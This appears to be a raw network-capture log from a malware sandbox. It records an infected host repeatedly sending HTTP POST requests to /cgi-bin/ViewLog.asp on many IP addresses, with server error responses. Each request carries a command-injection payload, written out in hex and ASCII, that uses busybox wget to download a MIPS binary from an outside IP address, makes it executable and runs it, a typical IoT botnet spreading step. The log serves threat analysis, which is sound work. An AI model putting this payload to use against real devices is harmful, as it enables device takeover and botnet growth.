                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              31192.168.2.135528685.92.211.848080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:06.400949955 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:06.587238073 CET367INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              32192.168.2.135024062.29.28.1458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:06.437180996 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              33192.168.2.133393294.242.230.1408080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:06.709001064 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              34192.168.2.134066231.136.55.28080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:06.765904903 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:07.334706068 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:08.454688072 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:10.886674881 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:15.494832039 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:24.454664946 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:42.630594969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.494508982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              35192.168.2.135584294.121.77.298080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:06.883450985 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              36192.168.2.136001462.29.58.2208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:06.883994102 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              37192.168.2.134283262.29.93.1558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:06.884773970 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              38192.168.2.134094631.136.67.1128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:10.340039968 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:13.446679115 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:19.590723038 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:31.622654915 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:56.966684103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:46.118432999 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              39192.168.2.135018695.216.222.1068080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:10.346592903 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:10.542443991 CET552INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:15:10 GMT
                                              Server: Apache/2.4.38 (Debian)
                                              Content-Length: 304
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              40192.168.2.133716694.103.82.1508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:11.325439930 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              41192.168.2.135284262.225.8.1898080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:11.332099915 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:11.522294998 CET1215INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:15:11 GMT
